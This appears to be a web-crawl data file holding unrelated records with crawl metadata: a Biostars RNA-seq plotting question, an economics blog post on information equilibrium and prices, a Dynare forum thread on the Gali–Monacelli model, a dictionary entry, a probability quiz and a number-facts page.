[ "Question: RNA-Seq data Quality Assessment- BoxPlot Interpretation\n1\nAynur40 wrote:\n\nHello,\n\nHere is the boxplot, I got for my RNA-Seq data.", null, "My data is\n\n``````head(rawCountTable)\ncon-1 con-2 a-1 a-2 b-1 b-2 c-1 c-2 d-1 d-2\nENSMUSG0000000000 0 0 0 0 0 0 0 0 0 0\nENSMUSG00000000028 854 937 1143 1029 912 856 809 754 513 520\nENSMUSG00000000031 822918 817451 716860 691396 763705 829274 838094 819312 717935 730879\n``````\n\nThe code for Boxplot is below:\n\n``````pseudoCount = log2(rawCountTable + 1)\ndf = melt(pseudoCount, variable.name = \"Samples\",\nvalue.name = \"count\") # reshape the matrix\ndf = data.frame(df, Condition = substr(df\\$Samples, 1, 4))\n``````\n\nHere is my code for the density plot.\n\n``````ggplot(df, aes(x = count, colour = Samples, fill = Samples)) + ylim(c(0, 0.17)) + geom_density(alpha = 0.2, size = 1.25) + facet_wrap(~ Condition) + theme(legend.position = \"top\") + xlab(expression(log(count + 1)))\n``````\n\nThe density Plot is", null, "So, my question is I want to know how to interpret these plots? How is my data quality? If you can recommend me an article about understanding these plots and assess my data, I would appreciate it.\n\nThank you very much!\n\nmodified 9 weeks ago by rpolicastro2.0k • written 9 weeks ago by Aynur40\n\nThe image links are broken. Try hosting and embedding them by pressing the image button in the post.\n\nI've fixed it. OP used the embed code in image direct link field.\n\n2\nrpolicastro2.0k wrote:\n\nI don't think those plots are necessarily too informative about quality. If you want a general idea about the quality of the sequencing reads, use a program like FastQC. The alignment statistics from your aligner will then give you a good idea of the complexity of your library. If you plan on running differential expression on your data, you can generate PCA and heatmap plots, which will be a good first indicator of replicate concordance, and from those plots you can sometimes start seeing the difference between conditions. The DESeq2 is a good resource for making these plots.\n\nAlright. I already had my FastQC, and STAR aligning. I was making these plots to see between sample distribution prior to DEG analysis with DESeq2. These plots are mentioned in tutorials, and I am not sure if it is needed or not.\nIf this is not informing me of anything I should be aware of, then I will continue making PCA, MA plots, and DEG plots. Thanks." ]
[ null, "https://i.ibb.co/TtQRfw6/Boxplot.png", null, "https://i.ibb.co/gMdSsqN/Density-Plot.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7019928,"math_prob":0.9482936,"size":1245,"snap":"2020-45-2020-50","text_gpt3_token_len":398,"char_repetition_ratio":0.10394843,"word_repetition_ratio":0.028846154,"special_character_ratio":0.38313252,"punctuation_ratio":0.12741312,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96741295,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-26T19:06:42Z\",\"WARC-Record-ID\":\"<urn:uuid:db053861-0483-4b62-b1ba-00b0620e7542>\",\"Content-Length\":\"35190\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a56f11ff-ab3f-45ce-9037-2fdcb373fdff>\",\"WARC-Concurrent-To\":\"<urn:uuid:64e78f52-3ed2-4fd7-9fce-ead7960d027d>\",\"WARC-IP-Address\":\"69.164.220.180\",\"WARC-Target-URI\":\"https://www.biostars.org/p/456632/\",\"WARC-Payload-Digest\":\"sha1:GHSCZRFSLN5JTYEKHY3ULHRL6ZPSKDW7\",\"WARC-Block-Digest\":\"sha1:DJ35A2HLFCW2X3UBIT572ISWRTNIZ4MK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107891624.95_warc_CC-MAIN-20201026175019-20201026205019-00295.warc.gz\"}"}
https://informationtransfereconomics.blogspot.com/2016/05/what-happens-when-you-push-on-price.html
[ "## Monday, May 16, 2016\n\n### What happens when you push on a price?\n\nEd. note: This post has been sitting around because I never found a satisfying answer. However, this post from John Handley inspired a comment that led to a more scientific take on it.\nA lot of economics deals with situations where some entity impacts a market price: taxes, subsidies, or interest rates in general with a central bank. With the information equilibrium picture of economics, it's easy to say what happens when you change demand or supply ... the price is a detector of information flow.\n\nFor my thought experiments, I always like to think of an ideal gas with pressure $p$, energy $E$ and volume $V$ (analogous to price $p$, demand $D$ and supply $S$, respectively):\n\n$$p = k \\frac{E}{V}$$\n\nHow do I increase the pressure of the system? Well, I can reduce $V$ or increase $E$ (raise temperature or add more gas). One thing is for certain: grabbing the pressure needle and turning it will not raise the pressure of the gas! (This is like Nick Rowe's thought experiment of grabbing the speedometer needle).\n\n... at least under the conditions where the detector represents an ideal probe (the probe has minimal impact on the system ... like that pressure gauge or speedometer needle). But our probe is the market itself -- it is maximally connected to the system. Therefore when you push on a price (through a regulation, tax, minimum wage, or quota system), it does impact supply and/or demand. The and/or is critical because these impacts are observed to be empirically different.\n\nSince we don't know, we have to plead ignorance. Therefore price dynamics (for a short time and near equilibrium with $D \\approx D_{eq}$ and $S \\approx S_{eq}$) should follow:\n\n\\begin{align} \\frac{dp}{dt} = & a_{0} + a_{1} t + o(t^{2})\\\\ & + d_{10} (D - D_{eq}) + o(D^{2})\\\\ & + s_{10} (S - S_{eq}) + o(S^{2})\\\\ & + d_{11} \\frac{d}{dt} (D - D_{eq}) + o(D^{2})\\\\ & + s_{11} \\frac{d}{dt} (S - S_{eq}) + o(S^{2})\\\\ & + c_{20} (D - D_{eq})(S - S_{eq}) + o(D^{2}S^{2}) \\end{align}\n\nThis gives us an excellent way to organize a lot of effects. The leading constant coefficient would be where un-modeled macroeconomic inflation would go (it is a kind of mean field approximation). Entering into $a_{0}$ and $a_{1}$ would be non-ideal information transfer -- movements in the prices that have nothing to do with changes in supply and demand. Interestingly, these first terms also contain expectations.\n\nThe next terms do not make the assumption that $D_{eq} = S_{eq}$ or that they even adjust at the same rate. This covers the possibilities that demand could perpetually outstrip supply (leading to market-specific inflation -- housing comes to mind), and that demand adjust to price changes faster than supply does (or vice versa). For example, demand for gasoline is fairly constant for small shifts in price, so price changes reflect changes in supply ($d_{10} \\approx 0$). If you think pushing on a price moves you to a different equilibrium, then you might take $X_{eq} = X_{eq}(t)$, but we'll assume $dX_{eq}/dt = 0$ for now.\n\nBasically, your theory of economics determines the particular form of the expansion. The \"Walrasian\" assumption (per John Handley's post) is that $D = S$ always. Adding rational expectations of (constant) inflation leaves you with the model:\n\n$$\\frac{dp}{dt} = a_{0}$$\n\nAssuming information equilibrium yields a non-trivial restriction on the form of the expansion (see e.g. 
here for what happens when you add time to the information equilibrium condition). We obtain (taking $X - X_{eq} \\equiv \\Delta X$):\n\n$$\\frac{dp}{dt} = \\frac{k}{S_{eq}} \\frac{dD}{dt} - k \\frac{\\Delta S}{S_{eq}^{2}} \\frac{dD}{dt} - k \\frac{\\Delta D}{S_{eq}^{2}} \\frac{dS}{dt} + \\cdots$$\n\nWe find that almost all of the terms in the expansion above have zero coefficients. The leading term would be $d_{11} = k/S_{eq}$. The next terms would be the $c_{21}$ terms -- second order cross terms with one time derivative. Including only the lowest order terms and adding back in the possibility of non-ideal information transfer, we have\n\n$$\\frac{dp}{dt} = a_{0} + a_{1} t + \\frac{k}{S_{eq}} \\frac{dD}{dt}$$\n\nAll small price changes are due to (temporal) changes in demand or non-ideal information transfer! Integrating (dropping the higher order time term):\n\n$$p(t) - p(t_{0}) = a_{0} (t-t_{0}) + \\frac{k}{S_{eq}} (D(t) - D(t_{0}))$$\n\nThis means when you push on a price, at least to leading order, you impact demand (or cause non-ideal information transfer). It also has the opposite sign you might expect. An increase in price would increase demand! Note that this assumes general equilibrium (where demand and supply both adjust quickly to changes). But in general equilibrium, increasing demand means increasing supply as well, so we can understand the result that way. It could also be the case that nominal demand ($D$) goes up while real demand ($D/p$) goes down depending on the value of the coefficients.\n\nIf we assume demand adjusts slowly ($dD/dt \\approx 0$), then we get the \"Econ 101\" result (returning to information equilibrium) where an increase in price reduces demand, assuming supply is increasing (e.g. economic growth):\n\n$$\\frac{dp}{dt} = - k \\frac{\\Delta D}{S_{eq}^{2}} \\frac{dS}{dt}$$\n\nFor information equilibrium to reproduce the Econ 101 result that a tax increase reduces demand, you have to assume 1) information transfer is ideal, 2) demand changes slowly, and 3) economic growth ... or instead of 1-3, just assume non-ideal information transfer. Therefore the simplest explanations of the standard Econ 101 impacts of pushing on a price would actually be a decline in real demand or breaking information equilibrium.\n\nThis is not to say these assumptions aren't valid -- they could well be. It's just that there are a lot of assumptions at work whenever anyone tells you what the effects of changing a price are." ]
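A toy numerical illustration of the leading-order result just derived, p(t) - p(t0) = a0 (t - t0) + (k/S_eq)(D(t) - D(t0)). All constants and the demand path are made-up numbers, not estimates from the post; the initial price is set from the p = k D/S analogy stated at the top.

```python
# Toy numbers illustrating the integrated leading-order price equation above.
import numpy as np

k, S_eq, a0 = 1.2, 100.0, 0.01      # illustrative constants (not estimated)
t = np.linspace(0.0, 10.0, 6)
D = 50.0 + 2.0 * t                  # a demand path drifting upward (toy)

p0 = k * D[0] / S_eq                # initial price from p = k D / S
p = p0 + a0 * (t - t[0]) + (k / S_eq) * (D - D[0])

for ti, pi in zip(t, p):
    print(f"t={ti:4.1f}  p={pi:.3f}")
# With a0 = 0 (ideal information transfer) the price change tracks the change
# in demand alone, which is the point made in the text.
```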
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88161695,"math_prob":0.99718076,"size":6153,"snap":"2023-40-2023-50","text_gpt3_token_len":1566,"char_repetition_ratio":0.12441047,"word_repetition_ratio":0.01773399,"special_character_ratio":0.27336258,"punctuation_ratio":0.08898305,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99925053,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-11T07:20:06Z\",\"WARC-Record-ID\":\"<urn:uuid:3ab1b88c-821f-44ba-b38c-34a9bcca20b3>\",\"Content-Length\":\"93993\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:18a121b8-fc04-4b5c-83ab-0831b96dc202>\",\"WARC-Concurrent-To\":\"<urn:uuid:d544ad75-2851-45a3-990b-fefb247f4ea2>\",\"WARC-IP-Address\":\"172.253.63.132\",\"WARC-Target-URI\":\"https://informationtransfereconomics.blogspot.com/2016/05/what-happens-when-you-push-on-price.html\",\"WARC-Payload-Digest\":\"sha1:OZ4JA7S6LZBAIOUYGJQRT6OV3LNXKT3W\",\"WARC-Block-Digest\":\"sha1:54QDUW7XCWLDRG3ILQFIS62FRSE6ZIRR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679103558.93_warc_CC-MAIN-20231211045204-20231211075204-00642.warc.gz\"}"}
https://forum.dynare.org/t/gali-and-monacelli-2008/5173
[ "# Gali and Monacelli 2008\n\nHello everybody,\n\nI am trying to replicate “Optimal monetary and fiscal policy in a currency union” by Gali and Monacelli (2008). I am new to Dynare and I do not know how to solve my problem.\n\nI get this error message:\n\nError using print_info (line 80)\nThe steady state contains NaN or Inf\nprint_info(info,options_.noprint, options_);\nError in gali_monacelli_2008 (line 240)\nError in dynare (line 180)\nevalin(‘base’,fname) ;\n\nAttached you find my code.\n\nIt would be great if somebody could help me. Many thanks in advance for your help.\n\nKind regards\ngali_monacelli_2008.mod (6.33 KB)\n\nHello again,\n\nI still have problems with my mod file. I divided the model into two separate mod files, one for the country and one for the currency union, in order to see what is going wrong.\n\nThe currency model is now running, but I cannot figure out my mistake in case of the country model. I tried to use the mod file of Prof. Pfeifer for the Gali and Monacelli (2005) model as a guidance.\n\nAttached you find both mod files.\n\nKind regards\ngali_monacelli_2008_country.mod (4.38 KB)\ngali_monacelli_2008_union.mod (3.41 KB)\n\nAre you sure this split is possible. Shouldn’t there an equation linking the two blocks that will be undetermined when you separate the two?\n\nI tried to simplify the linking equation in order to avoid that problem. Of course, there might be a mistake.\n\nUnfortunately, I still have not managed to get the complete model running. I got rid of some equations, but there is still an error in the system of equations such that dynare cannot find the steady states for the equations 1. - 16. (except 10.).\n\nDo you have any idea how to solve that?\n\nKind regards\ng_m_2008.mod (6.32 KB)\n\nPut\n\nbefore steady to see the residuals of the equations. The problem with Gali’s papers is that some of his linearized equations still contain constant terms and you need to make this consistent. For example,\n\n```rr_star=rho_a+(y_bar_star(+1)-y_bar_star); //9. Union's natural level of interest rate, p.126 ```\nimplies that rr_star has steady state rho_a.\nYou will need something like\n\n```initval; rr_star=rho_a; r_star=rho_a; g_bar_star = log(BigChi); f_gap_star = -log(BigChi); end; ```\nBut this alone will not be sufficient, because I think there is still something wrong with some equations.\n\nDear Mr.Pfeifer,\n\nthank you very much for your help.\n\nWould you be so kind to explain me the meaning of the residuals here? What problems do the constant terms in the linearized equations cause? Is it that I am dividing by zero or something like this?\n\nUnfortunately, I think you are right, there is something wrong with the equations as well…\n\nMerry Christmas and kind regards,\nxyz\n\nThe residuals are the difference between the left and the right side of your equations, given the 0 starting values you provide. They show that some variables are not mean 0. This is per se not a problem in linear models, but you need to take care of this constant term in every equation that is affected.\n\nThank you Mr.Pfeifer. I think, I adjusted my mod file for the constant equations you mnetioned but it is still not working. Can you help me to find the mistake in my equations? I really do not know how to start finding the problem…\n\nThanky you very much in advance.\n\nKind regards\ng_m_2008.mod (6.59 KB)\n\ni rewrite your code after reading the article you referred. 
And the consequence of code simulation is same as the article.excuse my bad english\nuntitled3.mod (2.22 KB)\n\nDear chowshangyao, thank you very much for your help.\n\nIf I understand it correctly, you implemented the equations describing the optimal policy, right? My problem is, that if I manage to get the baisc model working, I want to add some government debt policies to the model. Thus, I think, I would have to recalculate the optimality conditions, right? In order to avoid that problem, I would like to base my mod-file on the equations describing the economy, and not on the optimality conditions. Does that make sense to you?\n\nDo you have (or anybody else) any suggestions to get my model running? I think, I need to include the monetary union, don’t I ? I would really appreciate any hints or suggestions!\n\nThank you very much in advance.\n\nKind regards\n\ni see what you mean.Some variables like nominal interest_rate and government expenditure are exogenous, optimal condition just determine the unique path for them.So giving any specific path to these exogenous variables can make the basic model working.\n\nback to the topic , i guess some equations like p - p(-1) = ppi make the code cannot work.So i add the risk sharing condition (c = c_star + (1- alpha*s) )into the model for solving the path of domestic consumption c and terms of trade s (As the equilibrium of union is independent to country i ,and the path of y_gap and f_gap ppi can be derived only by using equation(1) phillips curve and (2) Is curve. so the path of y_star c_ star y is known , and we can derive the c and s by using country i’s market clearing and risk sharing condition).\n\nDropping some equations can make it works.But even if i add one equation like p - p(-1) = ppi will also make it unworkable .It troubles me a lot.\nThere also has another thing troubles me that the steady value of some variables which should equal to zero are just close to 0 but not 0.\ng_m_2008.mod (6.52 KB)\n\ni had wrote a polite reply before ,but i forget to login …And it’s already 03:00 am in my country .If there are any inappropriate words ,please forgive me .\n\nDear chowshangyao, thank you very much for working so much on my code. You really helped me a lot as the code is running now.\n\nNonetheless, I do not really understand why these equations cause so much trouble. Does anybody understand this? Unfortunately, I think, the simulations based on your code do not produce the correct impulse response functions, do they? The output gap and the fiscal gap behave in the opposite way…\n\nKind regards\n\nOf course the simulation will be different . 
Because we define the government expenditure as g_star = BigChi*a_star , but the original(gali(2008) is g_star = log(BigChi) + a_star.\nFrom the original we can see g_gap_star = 0 for all period ,and the fiscal gap will satisfy f_gap_star = - y_gap_star(which can be regarded as the optimal fiscal policy).\nBut our code’s fiscal gap is f_gap_star = (g_star - y_star ) - log(BigChi) = (BigChi-1)*a_star - log(BigChi) - y_gap_star.On the other hand , the exogenous shocks may be badly defined,thus the irf works weirdly.\nFrom above, it’s obvious to see the reason why the consequence of our simulation is different from gali(2008).But i haven’t test it and cannot make sure whether it can be fixed only by modifying the path of government expenditure.\n\nDear chowshangyao,\n\nI adjusted the path for government expenditure to g = log(BigChi)+a (where in the paper do you find this?), and I get g_gap = 0 and f_gap= -y_gap. Thus, I think, this is working now.\nBut looking at the impulse response functions pictured in the paper, this does not seem to hold. There, y_gap initially drops to -0.2 whereas f_gap rises to 2… Is the related to how the shock is specified? The paper simulates a 1 percent rise in productivity. Do you know how to model that?\n\nI have an additional question on modifying the model. Do you think it is possible to implement a debt target and a government spending path to reduce the outstandig debt to that level in order to model a government debt policy (spending cut)?\n\nThank you very much for your help. I am new to dynare and to this kind of models, so I am really greatful for your support.\n\nKind regards\n\n@chowshangyao What is the problem when you add `p - p(-1) = ppi `\n@xyz There is no reason to suppose you cannot add a particular fiscal sector to the model.\n\nDear Mr.Pfeifer,\n\nwhen I add the equation you mentioned, I get the following error message again:\n\nError using print_info (line 80)\nThe steady state contains NaN or Inf\nprint_info(info,options_.noprint, options_);\nError in g_m_2008_2 (line 218)\nError in dynare (line 180)\nevalin(‘base’,fname) ;\n\nI am quite confused about this as I have seen equations like this in other models. Do you why it causes this error in my model?\n\nMoreover, do you know why my impulse response functions differ from the ones presented in the paper? How do I model a 1% shock to technology?\n\nThank you very much for your support.\n\nKind regards\ng_m_2008_2.mod (6.5 KB)\n\n1 Like\n\nThat is because the price level has a unit root and thus infinitely many possible steady states. You cannot endogenously compute it.\n\nFor a 1% technology shocks, set the standard deviation of the TFP shock to 0.01 in the shocks block.\n\nNonetheless, I do not really understand why these equations cause so much trouble. Does anybody understand this? Unfortunately I think, the simulations based on your code do not produce the correct impulse response functions, do they? The output gap and the fiscal gap behave in the opposite way.\n\nAs I said, you cannot try to compute something endogenously from the model when it is not uniquely determined. Only inflation is unique, but not the underlying price level." ]
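The steady-state point made in this thread can be written out explicitly: in a deterministic steady state the lead and current values of the natural output level coincide, so the natural-rate equation pins rr_star at rho_a rather than zero. That is why zero starting values leave a residual in that equation and why the suggested initval block sets rr_star = rho_a. A minimal statement in LaTeX:

```latex
% In a deterministic steady state, \bar{y}^{*}_{t+1} = \bar{y}^{*}_{t}, so the
% natural-rate equation quoted above keeps only its constant term:
\[
  rr^{*}_{t} = \rho_{a} + \left(\bar{y}^{*}_{t+1} - \bar{y}^{*}_{t}\right)
  \quad\Longrightarrow\quad
  rr^{*} = \rho_{a},
\]
% which is nonzero whenever \rho_{a} is, hence the nonzero residual when the
% steady-state solver is started from rr_star = 0.
```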
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9204393,"math_prob":0.76803493,"size":6764,"snap":"2022-05-2022-21","text_gpt3_token_len":1596,"char_repetition_ratio":0.11286982,"word_repetition_ratio":0.11433447,"special_character_ratio":0.23580721,"punctuation_ratio":0.109375,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96192336,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-26T17:53:04Z\",\"WARC-Record-ID\":\"<urn:uuid:c75ba3f9-7407-417c-9e84-62c494570560>\",\"Content-Length\":\"63446\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0457b7a5-f7ad-42b9-bfcc-7c09caf11ed1>\",\"WARC-Concurrent-To\":\"<urn:uuid:19f0c50f-195e-4733-8c1f-09b59c764333>\",\"WARC-IP-Address\":\"217.70.189.83\",\"WARC-Target-URI\":\"https://forum.dynare.org/t/gali-and-monacelli-2008/5173\",\"WARC-Payload-Digest\":\"sha1:JE6U262TKHQDQ3SEINC4E46NRYYJU6HW\",\"WARC-Block-Digest\":\"sha1:O3BFZ6J2L634GMZPXQDF6BWG7OV3MLLJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662619221.81_warc_CC-MAIN-20220526162749-20220526192749-00438.warc.gz\"}"}
https://telecommunication_en_ru.academic.ru/5447/linear_dispersion
[ "# linear dispersion\n\n\nlinear dispersion\nлинейная дисперсия\n\nEnglish-Russian dictionary of telecommunications. 2015.\n\n### Смотреть что такое \"linear dispersion\" в других словарях:\n\n• linear dispersion — tiesinė dispersija statusas T sritis fizika atitikmenys: angl. linear dispersion vok. Lineardispersion, f rus. линейная дисперсия, f pranc. dispersion linéaire, f …   Fizikos terminų žodynas\n\n• Dispersion (water waves) — This article is about dispersion of waves on a water surface. For other forms of dispersion, see Dispersion (disambiguation). In fluid dynamics, dispersion of water waves generally refers to frequency dispersion, which means that waves of… …   Wikipedia\n\n• Dispersion relation — The refraction of a light in a prism is due to dispersion. In physics and electrical engineering, dispersion most often refers to frequency dependent effects in wave propagation. Note, however, that there are several other uses of the word… …   Wikipedia\n\n• dispersion linéaire — tiesinė dispersija statusas T sritis fizika atitikmenys: angl. linear dispersion vok. Lineardispersion, f rus. линейная дисперсия, f pranc. dispersion linéaire, f …   Fizikos terminų žodynas\n\n• Linear regression — Example of simple linear regression, which has one independent variable In statistics, linear regression is an approach to modeling the relationship between a scalar variable y and one or more explanatory variables denoted X. The case of one… …   Wikipedia\n\n• Dispersion (optics) — This article is about dispersion of waves in optics. For other forms of dispersion, see Dispersion (disambiguation). In a prism, material dispersion (a wavelength dependent refractive index) causes different colors to refract at different angles …   Wikipedia\n\n• dispersion — /di sperr zheuhn, sheuhn/, n. 1. Also, dispersal. an act, state, or instance of dispersing or of being dispersed. 2. Optics. a. the variation of the index of refraction of a transparent substance, as glass, with the wavelength of light, with the… …   Universalium\n\n• Linear response function — A linear response function describes the input output relationshipof a signal transducer such as a radio turning electromagnetic waves into musicor a neuron turning synaptic input into a response.Because of its many applications in information… …   Wikipedia\n\n• dispersion, longitudinal —    Process whereby some of the water molecules and solute molecules travel more rapidly than the average linear velocity and some travel more slowly which results in spreading of the solute in the direction of the bulk flow …   Lexicon of Cave and Karst Terminology\n\n• Statistical dispersion — In statistics, statistical dispersion (also called statistical variability or variation) is variability or spread in a variable or a probability distribution. Common examples of measures of statistical dispersion are the variance, standard… …   Wikipedia\n\n• Generalized linear model — In statistics, the generalized linear model (GLM) is a flexible generalization of ordinary least squares regression. It relates the random distribution of the measured variable of the experiment (the distribution function ) to the systematic (non …   Wikipedia\n\n### Книги\n\nWe are using cookies for the best presentation of our site. Continuing to use this site, you agree with this." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7004927,"math_prob":0.90044004,"size":4088,"snap":"2020-10-2020-16","text_gpt3_token_len":924,"char_repetition_ratio":0.1469148,"word_repetition_ratio":0.11643836,"special_character_ratio":0.18468688,"punctuation_ratio":0.115085535,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.976482,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-04T22:58:06Z\",\"WARC-Record-ID\":\"<urn:uuid:bc8c391a-eb54-4459-9c7b-6011840a179f>\",\"Content-Length\":\"51886\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:772dd6ef-d434-460e-a1fe-4458b81dbda7>\",\"WARC-Concurrent-To\":\"<urn:uuid:199b0b07-d3ee-4419-b01a-c3ecc93fcfba>\",\"WARC-IP-Address\":\"95.217.42.33\",\"WARC-Target-URI\":\"https://telecommunication_en_ru.academic.ru/5447/linear_dispersion\",\"WARC-Payload-Digest\":\"sha1:BYVU3AP3PPLWSAY4XBLJND2TJP4KB6JD\",\"WARC-Block-Digest\":\"sha1:ZYFBVTOQNWSZUTJ6SPFFMRT4SVFY3DQ6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370525223.55_warc_CC-MAIN-20200404200523-20200404230523-00078.warc.gz\"}"}
https://dapzoi.com/mathematics-class-12-mcq/probablity-mcq-questions-and-answers
[ "# Probablity MCQ Questions And Answers - Mathematics Class 12\n\nProbablity MCQs : This section focuses on the \"Probablity\" in Mathematics Class 12. These Multiple Choice Questions (MCQs) should be practiced to improve the Mathematics Class 12 skills required for various interviews (campus interview, walk-in interview, company interview), placement, entrance exam and other competitive examinations.\n\nQuestion 1\n\nProbablity equal to the?\n\nA. ratio of the number of favourable results and the total number of input\nB. ratio of the number of favourable outcome and the total number of outcomes\nC. ratio of the number of favourable results and the total number of favourable results\nD. ratio of the number of favourable results and the total number of outcomes\n\nQuestion 2\n\nThe probability formula is defined as the likelihood of an event to happen.\n\nA. Yes\nB. No\nC. Can be yes or no\nD. Can not say\n\nQuestion 3\n\nP(S|F) = P(F|F) = ?\n\nA. 0\nB. 1\nC. infinite\nD. random number\n\nQuestion 4\n\nIf P (A) = 0.8, P (B) = 0.5 and P (B|A) = 0.4, find:P (A ∩ B)\n\nA. 0.64\nB. 0.98\nC. 0.32\nD. 0.4\n\nQuestion 5\n\nP(E|F) = P(E ∩ F)/P(F), provided P(F) can not be?\n\nA. 1\nB. 0\nC. Both A and B\nD. Can not say\n\nQuestion 6\n\nLet A and B be two given events such that P(A) = 0.6, P(B) = 0.2 and P(A/B) = 0.5. Then P(A'/B') is\n\nA. (1/10)\nB. (3/10)\nC. (3/8)\nD. (6/7)\n\nQuestion 7\n\nIf P(A ∩ B) = 70% and P(B) = 85%, then P(A/B) is equal to\n\nA. (14/17)\nB. (17/20)\nC. (7/8)\nD. (1/8)\n\nQuestion 8\n\nTwo dice are thrown once. If it is known that the sum of the numbers on the dice was less than 6 the probability of getting a sum 3 is\n\nA. (1/18)\nB. (5/18)\nC. (2/5)\nD. (1/5)\n\nQuestion 9\n\nThree balls are drawn from a bag containing 2 red and 5 black balls, if the random variable X represents the number of red balls drawn, then X can take values\n\nA. 0,1,2,3\nB. 0,1,2\nC. 0\nD. 1,2" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.847803,"math_prob":0.9938246,"size":1945,"snap":"2022-27-2022-33","text_gpt3_token_len":666,"char_repetition_ratio":0.14270994,"word_repetition_ratio":0.08730159,"special_character_ratio":0.33470437,"punctuation_ratio":0.15757576,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99943423,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-03T15:41:55Z\",\"WARC-Record-ID\":\"<urn:uuid:46cde570-f093-498e-8115-dd48dbfc51a9>\",\"Content-Length\":\"15434\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:76882f98-e4a2-4399-948a-5657d9882c2a>\",\"WARC-Concurrent-To\":\"<urn:uuid:14f93ba9-3f47-4a26-92ab-769b0015191d>\",\"WARC-IP-Address\":\"157.245.101.253\",\"WARC-Target-URI\":\"https://dapzoi.com/mathematics-class-12-mcq/probablity-mcq-questions-and-answers\",\"WARC-Payload-Digest\":\"sha1:IMLSRUGZFX32LTZGENWCGI25GWDHVIDC\",\"WARC-Block-Digest\":\"sha1:KQR5EM4KNEGZQIUTITCRK7VFN3ZLRIPZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104244535.68_warc_CC-MAIN-20220703134535-20220703164535-00097.warc.gz\"}"}
https://metanumbers.com/1024516
[ "1024516 (number)\n\n1,024,516 (one million twenty-four thousand five hundred sixteen) is an even seven-digits composite number following 1024515 and preceding 1024517. In scientific notation, it is written as 1.024516 × 106. The sum of its digits is 19. It has a total of 3 prime factors and 6 positive divisors. There are 512,256 positive integers (up to 1024516) that are relatively prime to 1024516.\n\nBasic properties\n\n• Is Prime? No\n• Number parity Even\n• Number length 7\n• Sum of Digits 19\n• Digital Root 1\n\nName\n\nShort name 1 million 24 thousand 516 one million twenty-four thousand five hundred sixteen\n\nNotation\n\nScientific notation 1.024516 × 106 1.024516 × 106\n\nPrime Factorization of 1024516\n\nPrime Factorization 22 × 256129\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 2 Total number of distinct prime factors Ω(n) 3 Total number of prime factors rad(n) 512258 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 0 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 1,024,516 is 22 × 256129. Since it has a total of 3 prime factors, 1,024,516 is a composite number.\n\nDivisors of 1024516\n\n6 divisors\n\n Even divisors 4 2 2 0\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 6 Total number of the positive divisors of n σ(n) 1.79291e+06 Sum of all the positive divisors of n s(n) 768394 Sum of the proper positive divisors of n A(n) 298818 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 1012.18 Returns the nth root of the product of n divisors H(n) 3.42856 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 1,024,516 can be divided by 6 positive divisors (out of which 4 are even, and 2 are odd). The sum of these divisors (counting 1,024,516) is 1,792,910, the average is 2,988,18.,333.\n\nOther Arithmetic Functions (n = 1024516)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 512256 Total number of positive integers not greater than n that are coprime to n λ(n) 256128 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 80114 Total number of primes less than or equal to n r2(n) 8 The number of ways n can be represented as the sum of 2 squares\n\nThere are 512,256 positive integers (less than 1,024,516) that are coprime with 1,024,516. 
